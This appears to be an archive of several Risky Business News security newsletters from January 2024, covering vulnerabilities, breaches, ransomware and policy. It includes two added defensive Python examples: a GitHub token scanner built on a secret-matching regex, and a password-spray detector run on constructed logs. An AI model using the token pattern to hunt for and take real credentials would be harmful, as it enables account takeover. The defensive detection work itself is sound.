Jenkins exposure: More than 45,000 Jenkins servers are currently exposed on the internet and are vulnerable to attacks via a flaw in the application's CLI component. Tracked as CVE-2024-23897, the vulnerability was discovered by SonarSource researchers and patched last week. It has a severity rating of 9.8/10 and allows attackers to retrieve cryptographic keys, delete files, or run malicious code. Proof-of-concept code has been published online, and early scanning activity has already been observed.

Ivanti patches delayed: Enterprise software maker Ivanti has delayed crucial patches meant to fix two zero-days in its Connect Secure VPN devices. Ivanti released temporary mitigations for its customers at the start of the month and promised to have firmware updates by January 22. More than a week later, Ivanti has yet to release the updates and to provide an explanation for its delay. Tracked as CVE-2023-46805 and CVE-2024-21887, the two zero-days have been exploited in the wild by a Chinese APT group named UTA0178 since early December of last year.

Android OEM issue: Meta's Red Team X has found that several major Android OEMs sign their APEX modules with private keys from the Android project's public source code repository. Researchers say the issue could have allowed threat actors to forge updates for APEX, a file format used to ship Android system components. Meta says most vendors have fixed the issue in December 2023 security updates—tracked as CVE-2023-45779.

Tor security audit: The Tor Project published its recent security audit for the source code of the Tor network and its browser.

Splunk security updates: Splunk has released security patches to fix three vulnerabilities in its products.

Infosec industry

New tool—White Phoenix web version: CyberArk has released a web version of White Phoenix, a tool that can be used in some limited cases to recover files that have been encrypted using intermittent encryption.

New tool—PolEx: DoyenSec has open-sourced a tool named PolEx, a Visual Studio Code extension to analyze Infrastructure as Code (IaC) architectures and the points where a web application and the underlying infrastructure intersect.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how the war in Ukraine is showing how useful mobile devices are in a war. Using them is risky, but those risks need to be managed.

Risky Biz News: DOJ and FTC tell companies to stop deleting chats

29 January 2024 at 00:30

This newsletter is brought to you by enterprise browser maker Island. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Federal investigators are warning companies not to delete chats and to preserve conversations that have taken place via business collaboration and ephemeral messaging platforms.

In press releases on Friday, the US Department of Justice and the US Federal Trade Commission announced that they updated the language in their preservation letters and specifications—documents they send to companies under federal investigations.

The new language updates evidence preservation procedures to cover modern tech stacks such as Slack, Microsoft Teams, and Signal.

Companies that receive subpoenas or other legal notifications will have to take steps to preserve chat logs and disappearing IM messages.

Companies that fail to comply will be charged with obstruction of justice.

"These updates to our legal process will ensure that neither opposing counsel nor their clients can feign ignorance when their clients or companies choose to conduct business through ephemeral messages," said Deputy Assistant Attorney General Manish Kumar of the Justice Department’s Antitrust Division.

The new guidance comes as the DOJ faced difficulties in its Google and Amazon antitrust lawsuits.

In February 2023, the DOJ accused Google of lying when it claimed to have suspended its chat auto-deletion feature. In addition, the DOJ claimed that for a period of four years, Google trained employees to delete internal chats and move conversations to off-the-record platforms because it anticipated facing antitrust litigation in the near future.

In November 2023, the FTC similarly accused Amazon of deleting more than two years' worth of internal Signal employee chats after the agency started a multi-state antitrust lawsuit.

Court document showing Google CEO Sundar Pichai asking employees to turn chat history off

Breaches, hacks, and security incidents

Mercedes-Benz leak: German automaker Mercedes-Benz accidentally exposed all of its source code after it left a GitHub access token exposed online. Security researchers from RedHunt Labs discovered the leak. Researchers say the token granted access to the company's GitHub Enterprise Server, where they found API keys to pivot inside the company's Azure and AWS cloud infrastructure. [Additional coverage in TechCrunch]
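The Mercedes-Benz incident above started with a single access token committed where it could be read. A pre-commit or repository scan for the documented GitHub token shapes is the cheapest control against that class of leak. The following is an added example written for this newsletter, not RedHunt Labs' tooling or anything Mercedes-Benz uses. It assumes the public token formats (classic tokens: a `ghp_`/`gho_`/`ghu_`/`ghs_`/`ghr_` prefix plus 36 base62 characters; fine-grained tokens: `github_pat_` plus 22 characters, an underscore, and 59 characters) and uses an entropy threshold so that template placeholders such as `ghp_xxxx...` are not reported. The sample file and its token values are constructed and fake.

```python
import math
import re
from collections import Counter

# Constructed sample input (not a real file): a settings file that someone
# committed with a personal access token pasted in. Both token values are fake.
SAMPLE_FILE = """\
# deploy settings (constructed sample, not a real file)
registry_url = https://registry.example.internal
github_token = ghp_0123456789abcdefghijklmnopqrstuvwxyz
# placeholder left by a template; low entropy, should not be reported
github_token_example = ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
"""

# Documented GitHub token shapes: classic tokens use a 4-character prefix plus
# 36 base62 characters; fine-grained PATs use github_pat_ + 22 + "_" + 59.
TOKEN_RE = re.compile(
    r"\b(?:gh[pousr]_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59})\b"
)

# Real tokens are random; repeated placeholder characters score near 0 bits.
MIN_ENTROPY_BITS = 3.0


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character of the string s."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(token: str) -> str:
    """Keep only the prefix and the last four characters for reporting."""
    return f"{token[:4]}...{token[-4:]}"


def find_github_tokens(text: str) -> list[dict]:
    """Return one finding per high-entropy GitHub token found in text.

    Each finding carries the 1-based line number, a redacted token and the
    entropy of the random part, so the report itself never re-leaks the secret.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in TOKEN_RE.finditer(line):
            token = match.group(0)
            prefix_len = len("github_pat_") if token.startswith("github_pat_") else 4
            entropy = shannon_entropy(token[prefix_len:])
            if entropy < MIN_ENTROPY_BITS:
                continue  # template placeholder or redacted value, not a secret
            findings.append(
                {"line": lineno, "token": redact(token), "entropy": round(entropy, 2)}
            )
    return findings


if __name__ == "__main__":
    for f in find_github_tokens(SAMPLE_FILE):
        print(f"line {f['line']}: {f['token']} (entropy {f['entropy']} bits)")
```

Running the block reports only line 3; the placeholder on line 5 matches the regex but fails the entropy check. Wiring `find_github_tokens` into a pre-commit hook over staged files catches the token before it reaches a remote; scanning an existing repository's history is the equivalent check for tokens that are already committed, which should then be revoked rather than merely deleted from the tree.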

SolarWinds files to dismiss SEC lawsuit: Software maker SolarWinds has filed a motion to dismiss its SEC lawsuit in a New York court. The SEC sued SolarWinds and its CISO in October of last year arguing that the company lied about its cybersecurity posture to investors for years before it was hacked in 2020. SolarWinds says it disclosed all risks surrounding its business and informed investors when the hack took place. In a statement to Bloomberg Law, the company argues that the SEC is trying to "move the goalposts" and create new reporting requirements about a company's internal cybersecurity programs.

General tech and privacy

Windows Server 2025 & Insiders: Microsoft has launched an Insiders distribution channel for the Windows Server operating system. The channel will be used to test Windows Server features before they are shipped. The new channel will be available for Windows Server 2025, the next version of the Windows Server OS, announced on the same day. Windows Server 2025 will ship with universal hotpatching support, new versions for the AD and SMB protocols, Hyper-V and AI support.

Notepad update: Microsoft's engineers are working on sandboxing the Notepad editor's process.

Meta's data scraping case: A US judge ruled that Israeli company Bright Data did not violate Meta's terms of service when it scraped data from Facebook and Instagram. Meta sued the company in February 2023. The judge ruled that Bright Data didn't violate Meta's terms of service because it wasn't logged into a Meta account when it did the scraping—hence, the information was public anyway. As part of its defense, Bright Data revealed that Meta was one of its past customers and had paid it in the past to scrape other websites. [Additional coverage in CourthouseNews]

Twitter propaganda: Ahead of elections all over the world, Twitter is currently flooded with the most abhorrent political disinformation and misinformation. Here are some examples flooding the site these days. [Additional coverage in Der Spiegel, NYT, and Vice]

iOS notification abuse: Multiple popular iOS apps are abusing the short time window they are given to process a notification in order to send analytics back to their servers. The hidden behavior was discovered by German security researcher Tommy Mysk. The researcher says the apps are abusing a feature introduced in iOS 10 that allows apps to be woken up for a short period of time to process a notification before being put back to sleep. Mysk says that apps such as Facebook, TikTok, Twitter, LinkedIn, and Bing are abusing this small time window to collect and track users on their phones.

Government, politics, and policy

Brazil spyware scandal: Brazilian authorities have started an investigation against the country's former intelligence chief for organizing a mass surveillance campaign against the political rivals of former president Jair Bolsonaro. Brazilian Federal Police say they raided several homes owned by Alexandre Ramagen, the former head of ABIN, the country's intelligence agency. Officials say Ramagen created a "parallel structure" inside ABIN that targeted state governors, lawmakers, judges, and journalists. The ABIN unit allegedly used a spying tool named FirstMile, developed by Israeli company Cognyte. [Additional coverage in El Pais]

Ukraine cyber defense fund: The Danish government plans to send $13.25 million to boost Ukraine's cyber defense capabilities against cyber attacks.

USSS cyber board: The US Secret Service is reestablishing its Cyber Investigations Advisory Board. The Board was initially established in 2020 to help the agency overhaul its cyber investigations practices. The reestablished Board will include members from the public sector, academia, and non-profit organizations, who will advise the Secret Service on its cyber investigations. [Additional coverage in CyberScoop]

NSA confirms buying internet metadata: The US National Security Agency is buying internet traffic metadata known as netflow from commercial data brokers. The agency has confirmed the purchases in a letter to US Senator Ron Wyden. The NSA says it uses the data for mission-related activities, such as national security, cybersecurity, and foreign intelligence collection. NSA Director Paul Nakasone says the agency has taken steps to minimize cases where it buys data on Americans, such as not acquiring data from US smart cars. The agency also doesn't buy netflow data exchanged between US internet providers, but it buys netflow data between US and foreign providers.

Section of the NSA letter confirming data acquisition practices

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Bradon Rogers, Chief Customer Officer at enterprise browser Island, on how a modern enterprise browser solution like Island can be used to replace, complement, or enhance some enterprise security tools or technology stacks.

Cybercrime and threat intel

Ransomware operator sentenced: A Canadian judge has sentenced an Ottawa man to two years in prison for launching ransomware attacks. Officials say Matthew Philbert infected more than 1,100 victims with ransomware using malicious emails. The 33-year-old is believed to have made $50,000 from his attacks, and some of his victims included police departments and children's charities. [Additional coverage in CBC]

Russian hacker detained: Ukraine's Security Service SBU has detained a member of pro-Kremlin hacking group Russia's Cyber Army. The suspect was identified as an IT specialist from Kharkiv who was recruited by the FSB through a specialized Telegram channel. Officials say the suspect prepared DDoS attacks against Ukrainian government sites and also adjusted Russian strikes against civilian targets in Kharkiv.

Serial swatter arrested in California: The FBI has arrested a 17-year-old from California on charges of orchestrating hundreds of swatting attacks across the US. Officials have described the teenager as one of the most prolific swatters in American history. He is suspected of orchestrating swatting events targeting schools, politicians' homes, courthouses, and religious institutions. The unnamed teen is also suspected to have operated Torswats, a Swatting-as-a-Service operation hosted on a Telegram channel. [Additional coverage in Wired]

Ermakov profile: Threat intel firm Intel471 has published a profile on REvil member Aleksandr Gennadievich Ermakov, the Russian behind the Medibank attack, recently sanctioned by Australian, UK, and US officials. In the meantime, there's a discussion that the ASD might have identified the wrong REvil member behind the Medibank attack.

Knight interview: Threat intelligence analyst Marco A. De Felice has published an interview with the operators of the Knight ransomware, a revamped version of the older Cyclops RaaS.

Malvertising in China: Malwarebytes looks at some malvertising campaigns targeting Chinese consumers with booby-trapped instant messaging apps.

Treewolf: Chinese security firm Duba Security has published a report on Treewolf, a threat actor infecting Chinese users with malware using classic state tax administration lures.

Dark Mosquito: Chinese security firm Antiy has published a report on Dark Mosquito, a threat actor targeting Chinese users with Windows, Linux, and macOS malware. Most of the group's operations rely on pirated software and malicious ads to deliver their payloads.

YouTube AI scam ads: It took an investigation and public shaming from a news outlet for Google to delete thousands of AI-generated ads that promoted Medicare scams for months. [Additional coverage in 404 Media]

New npm malware: 767 (yes, 767) malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

2023 cybercrime trends: Security firm RedSense published a report with the most common trends spotted across the cybercrime ecosystem last year. Examples include "ghost" cybercrime groups, actor profile diversification, black hat SEO, and attempts to weaponize AI.

2023 mobile threats: Mobile security firm Lookout has published its year-in-review report for 2023. Just as before, Android threats dominated the threat landscape.

Fewer ransomware victims are paying: The number of ransomware victims who opted to pay ransoms fell to an all-time low at the end of last year. Cybersecurity firm Coveware estimates that 29% of victims paid ransoms in Q4 2023, down from the 85% registered in Q1 2019 when the company began tracking the stat. Coveware attributes the fall to improved data backup and recovery strategies in corporate environments and companies getting smarter about not trusting empty promises made by ransomware groups.

Chart showing ransomware payment resolution rates declining over the past four years

Malware technical reports

PixPirate: IBM's Trusteer security division has discovered a new Android RAT that is currently used in the wild in attacks targeting the customers of Brazilian banks. Named PixPirate, the malware heavily utilizes anti-research techniques and goes after payment details used by Pix, a popular Brazilian payment system.

"PixPirate is not only an automated attack tool, but it also has the capability of becoming a manually operated remote control attack tool. This capability is probably implemented to manually execute fraud if the automatic fraud execution flows fail because the user interface of the banking app changes or if a new lucrative target presents itself."

Rage Stealer: CyFirma researchers have discovered a new infostealer used in the wild. The stealer was created by a threat actor named "nsper" and is currently advertised on Telegram channels under names such as Rage Stealer, xStealer, and Priv8 Stealer.

RADX RAT: Russian security firm FACCT has discovered a new remote access trojan named RADX that is currently being used in attacks targeting Russian companies. Just like most of these things, the RAT is being advertised on underground forums.

Albabat ransomware: Fortinet researchers have published a report on Albabat, or White Bat, a new ransomware strain they've spotted in the wild. Albabat is written in Rust, was first seen in the wild in November 2023, and appears to target home users, per Broadcom.

Desktop wallpaper showing the Albabat ransom note

Sponsor Section

Island is an enterprise browser that embeds access policies, data protection, and security controls to create a safe environment that works on unmanaged as well as managed endpoints. Take a look at Island's essential features below [PDF].

APTs, cyber-espionage, and info-ops

Midnight Blizzard: Microsoft has published a technical report describing how Russian APT group Midnight Blizzard gained access to its corporate email servers after password-spraying a test tenant account last November. According to Microsoft, the hackers pivoted from the test tenant to its corporate environment via a legacy OAuth app that had access to both environments and with elevated privileges on the corporate environment. Former Yahoo and Facebook CSO Alex Stamos published a deep dive into Microsoft's report and rips the company a well-deserved new one for its weasely legalese.
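The intrusion described above began with a password spray against a single test tenant account, a pattern that is easy to miss if sign-in failures are reviewed per account rather than per source. The following is an added example written for this newsletter, not Microsoft's detection logic or its sign-in log format. It assumes a simple constructed `key=value` sign-in log (not real data) and flags a source address that fails once or twice against many distinct accounts in a short window, then reports which accounts that source later signed into successfully, since the account that the spray lands on is the one to disable and investigate.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in log (not real data). Source 198.51.100.7 fails once
# against six different accounts in under five minutes and then succeeds against
# a stale test account, which is the spray shape. Source 203.0.113.9 is one user
# mistyping their own password and should not be flagged.
SAMPLE_SIGNINS = """\
2024-01-20T03:10:01Z src=198.51.100.7 user=alice@corp.example result=failure
2024-01-20T03:10:43Z src=198.51.100.7 user=bob@corp.example result=failure
2024-01-20T03:11:20Z src=203.0.113.9 user=grace@corp.example result=failure
2024-01-20T03:11:35Z src=198.51.100.7 user=carol@corp.example result=failure
2024-01-20T03:12:02Z src=203.0.113.9 user=grace@corp.example result=failure
2024-01-20T03:12:18Z src=198.51.100.7 user=dave@corp.example result=failure
2024-01-20T03:12:40Z src=203.0.113.9 user=grace@corp.example result=success
2024-01-20T03:13:05Z src=198.51.100.7 user=erin@corp.example result=failure
2024-01-20T03:13:51Z src=198.51.100.7 user=test-legacy@corp.example result=success
2024-01-20T03:14:22Z src=198.51.100.7 user=frank@corp.example result=failure
"""


def parse_signin(line: str) -> dict:
    """Parse one '<timestamp> key=value ...' line into a dict with a datetime."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect_password_spray(
    log_text: str,
    min_accounts: int = 5,
    window: timedelta = timedelta(minutes=10),
    max_per_account: int = 2,
) -> list[dict]:
    """Flag sources that fail against many accounts, few times each, in a window.

    A brute force against one account is many failures for one user; a spray is
    few failures for many users. Only the latter shape is reported here. For each
    flagged source the accounts it later signed into successfully are listed.
    """
    events = [parse_signin(l) for l in log_text.splitlines() if l.strip()]
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["result"] == "failure"]
        for i, start in enumerate(failures):
            in_window = [e for e in failures[i:] if e["time"] - start["time"] <= window]
            per_account = Counter(e["user"] for e in in_window)
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                successes = sorted(
                    {e["user"] for e in evs
                     if e["result"] == "success" and e["time"] >= start["time"]}
                )
                findings.append({
                    "src": src,
                    "accounts": len(per_account),
                    "first_seen": start["time"].isoformat(),
                    "last_seen": in_window[-1]["time"].isoformat(),
                    "successes": successes,
                })
                break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_SIGNINS):
        print(f"{f['src']}: {f['accounts']} accounts sprayed "
              f"{f['first_seen']}..{f['last_seen']}, landed on {f['successes']}")
```

The thresholds are deliberately loose for a small sample; on a real tenant the window and account count should be tuned to the normal failure rate, and a source that is a shared NAT address will need a higher bar. Detecting the spray covers only the first step of the intrusion above: the pivot ran through a legacy OAuth application holding elevated privileges in the corporate environment, so the matching preventive control is an inventory of application registrations and their granted privileges, with unused or over-privileged legacy apps removed.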

Stately Taurus: A Chinese APT group known as Stately Taurus (Bronze President, Camaro Dragon, Earth Preta, Mustang Panda, Red Delta, Luminous Moth) is conducting cyber-espionage campaigns targeting Myanmar's Ministry of Defence and Foreign Affairs. The campaign is taking place as a coalition of three rebel groups have taken control of the northern Shan state from the Myanmar military junta. Chinese officials previously expressed concern regarding the war's effect on trade routes and security around the China-Myanmar border.

UNC5221's WIREFIRE: QuoIntelligence has discovered a new version of WIREFIRE, one of the web shells used by Chinese APT group UNC5221/UTA0178 in its exploitation of the recent Ivanti Connect Secure zero-days (CVE-2024-21887 and CVE-2023-46805).

Vulnerabilities, security research, and bug bounty

GitLab security update: GitLab has published security updates to address five vulnerabilities in its self-hosted solution.

Panda vulnerabilities: Cybersecurity firm Sophos has discovered three vulnerabilities in the driver of fellow antivirus maker Panda Security. The vulnerabilities can allow remote code execution attacks in some scenarios. Sophos says it discovered the bugs after a customer conducted an APT simulation test.

Jenkins RCE PoC: Public proof-of-concept code has been published for the recent and pretty bad RCE vulnerability in the Jenkins CLI component.

Infosec industry

New tool—SOAPHound: Cybersecurity firm FalconForce has open-sourced a tool named SOAPHound that can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol.

New tool—TeamsBreaker: Security group ASOT has released TeamsBreaker, a tool designed for automating the sending of phishing messages to Microsoft Teams users.

New tool—PurpleLab: Security researcher Krook9d has open-sourced PurpleLabs, a web-based lab setup for cybersecurity professionals to test detection rules, simulate logs, and undertake various security tasks.

Pwn2Own Automotive: French security firm Synacktiv has won the first-ever edition of the Pwn2Own Automotive hacking contest, which was held last week in Tokyo, Japan. Contestants used 49 different zero-days during the contest, earning more than $1.3 million in prizes for their efforts. Synacktiv alone took home $450,000, a third of the earnings. During the contest, researchers hacked Tesla cars, EV charging stations, and the Automotive Grade Linux operating system.

Results of the Pwn2Own Automotive 2024 hacking contest

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how having so much data available about Americans feels creepy, yet there is little visible harm to individuals. But there are still reasons to be worried.

Risky Biz News: SVR hackers also breached HPE

26 January 2024 at 00:30

This newsletter is brought to you by Material Security, the company that secures the cloud office with unified email security, user behavior analytics, and data loss prevention for Microsoft 365 and Google Workspace. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Days after Microsoft revealed a security breach by a Russian state-sponsored hacking group, Hewlett Packard Enterprise disclosed a similar breach at the hands of the same group.

In a document filed with the US Securities and Exchange Commission (SEC), HPE blamed the breach on Midnight Blizzard, a hacking group believed to be one of the cyber units operating inside Russia's Foreign Intelligence Service (SVR).

HPE says the group breached its cloud infrastructure in May of last year.

The company learned of the hack for the first time in June, but an initial investigation revealed the group only managed to collect and steal a limited number of SharePoint files.

HPE says that despite its initial containment, the group appears to have maintained access to its cloud infrastructure.

The tech giant was notified again in December, and a new investigation revealed the group managed to steal emails from some of its employees in the company's cybersecurity, go-to-market, and business departments.

The incident marks the second time that a major company spotted Midnight Blizzard stealing emails from their cybersecurity team. In its SEC disclosure, Microsoft said the group searched the emails of its cybersecurity team to look for information on itself in an attempt to learn what Microsoft knew about them.

The two SEC filings come on the heels of new SEC cybersecurity regulations that entered into effect in December and which mandate that companies listed on the stock market disclose any cybersecurity incident that may have a "material" impact on share prices and shareholders.

As legal and infosec commentator Brian in Pittsburgh points out, the new rules appear to have changed the entire cybersecurity landscape.

Both SEC disclosures paint a picture where two major tech companies hid major APT intrusions from authorities, the public, and shareholders.

Tweets from Brian in Pittsburgh

Although the new SEC breach disclosure rules have been criticized by the private sector and some US lawmakers because they might overlap with other breach disclosure requirements, they appear to be more effective, as we've learned of an HPE APT intrusion the company easily buried last year.

In addition, the same SEC breach disclosure rules are also making companies disclose ransomware attacks much faster than last year. Instead of waiting for weeks, we now usually see an SEC filing days after an attack, along with additional follow-ups containing far more details about what happened than we've seen in previous years.

It's quite clear that many companies are erring on the side of caution, until they learn how they can manipulate and push on the SEC's new rules.


Breaches, hacks, and security incidents

Israeli movie theaters defacements: A Turkish hacktivist group has defaced screens inside Tel Aviv movie theaters to show images from the October 7 Hamas attack. [Additional coverage in Ynet]

Defaced screens at Israeli cinemas
Image: Ynet

Monobank DDoS attacks: A massive DDoS attack has disrupted the activities of Monobank, Ukraine's largest mobile banking operator. Disruptions were recorded over the weekend and linked to Russian "hacktivist" groups. The bank was also targeted on December 12 of last year, on the same day that Russian military hackers wiped systems at Kyivstar, the country's largest mobile operator. [Additional coverage in the Kyiv Independent]

NoName DDoS attacks: After getting absolutely ignored by the Romanian government, the pro-Kremlin "hacktivist" group NoName has spent the last two days harassing the IT teams responsible for government sites in France, Finland, and Poland.

EquiLend cyber incident: Securities lending platform EquiLend has shut down its IT systems in the aftermath of a cybersecurity incident. The incident took place on January 22. The company told customers it may take several days to restore services. EquiLend serves some of the world's largest banks and stock markets, and its NGT platform handles more than $2.4 trillion in securities transactions each month.

Veolia ransomware incident: The North American branch of water and waste management company Veolia has suffered a ransomware attack [archived].

AerCap ransomware incident: Aircraft leasing company AerCap has confirmed that it suffered a ransomware attack on January 17. In documents filed with the SEC, the company says it regained full control over its IT systems, and it's in the process of investigating what data was stolen. The company is the first victim listed on the dark web leak site of a new ransomware gang named Slug. AerCap is the world's largest aircraft leasing company, operating out of the US and Ireland.

AerCap listed on the Slug ransomware portal

Planeta hack: A pro-Ukrainian hacktivist group named the BO Team has hacked and wiped 280 servers at one of Russia's space and meteorology research centers. Ukraine's Defence Intelligence Main Directorate (GUR) says the hack crippled the center's activity of processing satellite data for Russia's Defense Ministry and Ministry of War. Ukrainian officials say the hackers destroyed 2 PB of data and crippled the activity of the center's expensive supercomputers.

Major Indian mobile data leak: A threat actor named CyboDevil is selling a giant database that allegedly contains the data of more than 750 million Indian nationals. According to security firm CloudSEK, the data appears to have been aggregated from multiple Indian mobile operators. The threat actor claims the database contains the personal details of 85% of India's population. The data is being advertised in several places, such as Telegram and underground hacking forums. [Additional coverage in Scroll.in]

Ad on hacking forum advertising hacked Indian database
Image: CloudSEK

General tech and privacy

Firefox 122: Mozilla has released Firefox 122. New features and security fixes are included. The biggest updates are improvements to the browser's built-in translator and support for passkeys on macOS.

Passkeys on Twitter: Twitter has announced support for passkeys on iOS devices. This is available for both free and paid users alike.

Pixel update issues: Google paused the January 2024 Google Play system update after the patch started causing storage issues on Pixel devices. [Additional coverage in AndroidPolice]

New Meta teen protections: Meta is rolling out an update to its Instagram and Facebook Messenger services to block strangers from sending direct messages to underage children (under 16/18, depending on the country). Starting this week, accounts for children will only be able to receive messages from individuals in their friend list or phone address book. Meta is rolling out the changes two days before its executives are set to testify in front of a US Senate hearing that will address child safety on social media.

Ring: Amazon's Ring security camera service announced that it will stop honoring law enforcement requests to access data without a court warrant.

Telegram, criminal's safe haven: Dutch TV station NOS reports, citing Dutch police sources, that Telegram is barely responding to requests to take down Telegram channels advertising drugs.

Apple-v-NSO lawsuit: A US judge has denied an NSO Group request to dismiss a lawsuit filed by Apple. The American company sued the Israeli spyware maker in November 2021 in an attempt to obtain a court order to prevent NSO from developing iPhone exploits. A US judge shot down NSO Group's attempts to dismiss the US lawsuit and move it to its home turf in Israel. [Additional coverage in 9to5Mac]

Apple EU changes: With the upcoming release of iOS 17.4, Apple will allow alternative app stores to be installed on EU devices. The update is part of the company's larger set of changes designed to comply with the EU Digital Markets Act (DMA). Other changes include free access to the iPhone's NFC chip to support third-party payment solutions and the ability for browser makers like Google, Mozilla, and Microsoft to use their own browser engines instead of Safari's standard WebKit. Users will also have, for the first time, the ability to side-load apps on iOS, similar to Android.

Government, politics, and policy

Incoming Biden EO on personal data transfers: Bloomberg reports that the White House is preparing to issue an executive order to ban data aggregators from selling American citizens' data overseas. We'll have more when the EO comes out.

NSO lobbying in Washington: Israeli spyware maker NSO Group has amped up its Washington lobbying efforts in an attempt to get itself off the US sanctions list. The company has recently released a transparency report and is using its role in the Hamas war as a way to prove its usefulness for government operations. NSO officials say that as part of their compliance work, they have terminated six customer accounts following reports of human rights abuse and product misuse. [Additional coverage in Wired]

NCSC warning on AI: The UK's NCSC has published an advisory warning that over the course of the next two years, AI technologies will lead to an increase in the efficacy of cyber operations, such as ransomware, social engineering, reconnaissance, and others.

ACSC guidance on AI: Australia's ACSC, together with its Five Eyes counterparts, has published guidance on how to use AI systems securely.

BabakovLeaks fallout: Back in August 2023, a pro-Ukrainian hacktivist group named Cyber Resistance hacked and leaked emails from Oleksandr Babakov, deputy chairman of the Russian State Duma. Months later, journalists from InfoNapalm have sifted through the data and found Russian insiders in Serbian politics and a Russian campaign to influence EU news media.

Belarus changes military doctrine: The Belarusian government is updating its military doctrine to allow for the use of military force in response to destructive cyber attacks. A similar provision exists in the NATO treaty. Russian policy expert Oleg Shakirov points out that no such provision currently exists in Russian military doctrine. The new Belarusian military doctrine also includes a provision to allow the country to use nuclear weapons. Russia sent tactical nuclear weapons to Belarus in May 2023. [Additional coverage in Belarus News]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Ivan Dwyer of Material Security about how it makes sense to view office productivity suites as an organisation's critical infrastructure.

Cybercrime and threat intel

Trickbot author sentenced: A US judge has sentenced a Russian national to five years and four months in prison for his role in developing and deploying the Trickbot malware. Vladimir Dunaev developed browser modifications that aided Trickbot in stealing browser credentials and deploying additional malware on infected computers. Dunaev was arrested in late 2021 after getting stuck in South Korea due to COVID-19 travel restrictions. He was extradited to the US and charged a month later.

Scattered Spider member detained: US authorities have detained a 19-year-old from Florida on charges of wire fraud, aggravated identity theft, and stealing $800,000 worth of cryptocurrency from five victims. Noah Michael Urban operated online under nicknames such as "Sosa," "King Bob," and "Anthony Ramirez." One source has told Risky Business that Urban is suspected to be an affiliate of the Scattered Spider group.

TLO admin charged: US prosecutors have charged and filed an arrest warrant for a Baltimore man suspected of running an underground cybercrime service. Chouby Charleron allegedly ran TLO, a Telegram bot that allowed other threat actors to purchase the personal data of any American citizens for prices between $15 and $25. The service gained a reputation in underground circles for its accuracy and was widely used for doxxing, financial fraud, and swatting.

GitLab exposure: More than 5,300 GitLab servers are currently exposed on the internet and are affected by a vulnerability that allows threat actors to reset passwords and hijack admin accounts. Tracked as CVE-2023-7028, the vulnerability was patched on December 11, last year. Most of the vulnerable servers are located in the US, Germany, Russia, and China, according to a scan performed by the Shadowserver Foundation. GitLab admins and users can mitigate the attack without patching by enabling 2FA for their accounts. Proof of concept code has been available online since the day of the patch, and exploitation has already taken place.

World map of location of vulnerable GitLab servers
Image: Shadowserver Foundation

Qwiklabs abuse: Indian security firm CloudSEK looks at a payment scam operation that abuses the Qwiklabs cloud platform for its infrastructure.

Malvertising network: The same CloudSEK team looks at a massive malvertising campaign that is redirecting users to a network of more than 9,000 malicious domains.

Game hacks: AhnLab researchers have found several gaming-related hacks that secretly install a crypto-miner on users' devices. 2011 called! It wants its malware distribution tactics back.

Insider threats report: Security firm Securonix has published its 2024 Insider Threat Report, based on a survey of 450 cybersecurity professionals on the nature of insider threat challenges faced by organizations.

2023 malware report: ANY.RUN has published a report on the malware trends of 2023. The awards go to loaders (for the most popular malware family) and Redline (for the most popular malware).

2023 ransomware report: The number of victims listed on ransomware portals grew by 80% in 2023, with ransomware operations returning to their 2021 levels before Russia's invasion of Ukraine. The most prolific group last year was the LockBit gang, which listed more than 1,000 victims on its leak site. This marks the second year that LockBit topped the chart after it took the title from the now-defunct Conti gang in 2022. According to GuidePoint Security, US-based organizations accounted for 49% of all observed ransomware attacks in 2023. (Broadcom's Symantec also has one of these reports out, but they have AlphV on top over a different time period.)

Chart showing the most prolific ransomware groups of 2023
Image: GuidePoint Security

Malware technical reports

CherryLoader: Arctic Wolf has observed a new loader, dubbed CherryLoader, written in Go and used in recent intrusions.

AllaKore RAT: BlackBerry looks at a recent AllaKore RAT campaign targeting Mexican banks and Cryptocurrency platforms.

Faust ransomware: Fortinet researchers have discovered a new ransomware strain named Faust. The ransomware appears to be another variant of the old Phobos ransomware, whose source code was leaked online years ago.

Sponsor Section

A deep dive into what's new with Material Security's Phishing Protection product: New detections, response UX boosters, and more actionable reports.

APTs, cyber-espionage, and info-ops

APT10: Japanese security firm Itochuci has published a report on APT10's LODEINFO malware.

Timeline of the LODEINFO malware evolution

Blackwood: A Chinese cyber-espionage group named Blackwood has used adversary-in-the-middle (AitM) attacks to hijack updates for legitimate software applications. The AitM attacks intercepted and modified updates for Chinese software such as Tencent QQ, Sogou Pinyin, and WPS Office to deliver a new backdoor named NSPX30. Security firm ESET says the group has been active since 2018 and has targeted organizations and individuals in China, Japan, and the UK. Blackwood is now the third Chinese APT that was observed in recent years with AitM traffic interception capabilities, after LuoYu and Evasive Panda.

World map of Blackwood victims

IRGC groups: Recorded Future has published a report providing a summary of four organizations with links to Iran's Islamic Revolutionary Guard Corps (IRGC) and how some of their contractors have been linked to espionage, cybercrime, and influence operations overseas—eventually also landing on the US sanctions list.

Predatory Sparrow: Wired's Andy Greenberg has published an article covering all the Predatory Sparrow hacks that targeted Iranian organizations over the past two years.

